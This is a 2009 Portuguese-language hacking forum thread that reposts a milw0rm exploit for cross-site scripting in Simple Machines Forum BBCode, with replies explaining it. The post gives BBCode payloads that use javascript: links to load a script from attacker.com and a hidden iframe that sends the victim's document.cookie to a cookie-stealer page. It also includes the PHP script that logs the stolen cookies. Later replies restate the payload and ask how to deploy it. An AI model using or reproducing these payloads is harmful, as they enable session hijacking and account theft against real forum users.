Simple Machines Forums (BBCode) Cookie Stealing

Iniciado por Ωmega, 17 de Fevereiro , 2009, 08:57:08 PM

tópico anterior - próximo tópico

0 Membros e 1 Visitante estão vendo este tópico.

Imprimir
Ir para o fim Páginas1
Ações

Ωmega

17 de Fevereiro , 2009, 08:57:08 PM
Simple Machines Forums (BBCode) Cookie Stealing
Author: Xianur0

BBCode of the smf not filtered properly specified urls:

Código Selecionar
[center][size=14pt][url=javascript:alert('xss')]Saltando Filtro
:D...[/url][/size]
[url=javascript:document.write(unescape(%3Cscript+src%3D%22http%3A%2F%2Fwww.attacker.com%2Fexploit.js%22%3E%3C%2Fscript%3E))][img]http://img508.imageshack.us/img508/6982/flmnetworkuserbar494abfyb2.png[/img][/center]

Click on the image, run the javascript..

BBC Cookie Exploit:

Código Selecionar
[center][size=14pt][url=][/url][/size]
[url=javascript:
document.write(unescape('%3Ciframe+width%3D%220%25%22+height%3D%220%25%22+src%3D%22http%3A%2F%2Fwww.attacker.com%2Fcookiestealer.php%3Fcookie%3D%27+%2Bdocument.cookie+%2B%27+frameborder%3D%220%25%22%3E'));][img]http://www.google.com.mx/intl/es_mx/images/logo.gif[/img][/center]

PHP Cookie Stealer:

Código Selecionar
<?php
$cookie $_GET['cookie'];
$handler fopen('cookies.txt''a');
fwrite($handler$cookie."\n");
?>

# milw0rm.com [2009-02-03]
Ωmega

KEst

#1
20 de Fevereiro , 2009, 09:48:19 PM
o javascript eu nao entendi, mas pelo que entendi do php.
:o
uau, caramba!


by KEst

Campanha Converta-se a Gnu is Not Unix/Linux

VonNatur

#2
21 de Fevereiro , 2009, 03:47:56 PM
também não entendi alguém poderia explicar melhor como funciona esse falha ae?

[]'s

Be.Cool

#3
21 de Fevereiro , 2009, 07:18:57 PM
Dont have secret  :o
Isso é praticamente igual a todos o roubo de cookie que eu jah vi...
o primeiro javascript, vai escrever na pagina("document.write"), o script que esta hospedada em www.attacker.com/exploit.js, esse script: exploit.js, na verdade cria um frame("iframe") de uma pagina php...a qual ira sequestrar o cookie("$cookie = $_GET['cookie'];")
Tudo isso camuflado por imagens é claro :D.

Revisando...

Primeiro script (escreve na pagina vuln um segundo script) -> Usado para driblar os sm  security
Segundo script(cria um frame com codigos em php)
Terceiro script - Roubo do cookie em si...é aqui que tudo acontece.


Duvidas?

Hugs!

A sabedoria está em suas mãos

VonNatur

#4
21 de Fevereiro , 2009, 08:36:30 PM
vlws.

[]'s

Stradivous

#5
22 de Fevereiro , 2009, 10:58:01 PM
Agora tmb entendi. Valeu

0biwan

#6
09 de Outubro , 2009, 02:15:23 PM
e qual o codigo para o .js?!

Reeves

#7
09 de Outubro , 2009, 02:41:29 PM
0biwan... o js está no tópico...
Código Selecionar

javascript:document.write(unescape('%3Ciframe+width%3D%220%25%22+height%3D%220%25%22+src%3D%22http%3A%2F%2Fwww.attacker.com%2Fcookiestealer.php%3Fcookie%3D%27+%2Bdocument.cookie+%2B%27+frameborder%3D%220%25%22%3E'));][img]http://www.google.com.mx/intl/es_mx/images/logo.gif
  °vº   NÃO USE DROGAS,
/(_)\  USE GNU/LINUX
^ ^

0biwan

#8
09 de Outubro , 2009, 03:37:14 PM Última edição: 09 de Outubro , 2009, 03:44:55 PM por 0biwan
mas é esse que devo colocar em: www.attacker.com%2Fexploit.js ?!

acho que este exploit nao funciona na versao 1.1.8

obrigado
Imprimir
Ir para o topo Páginas1
Ações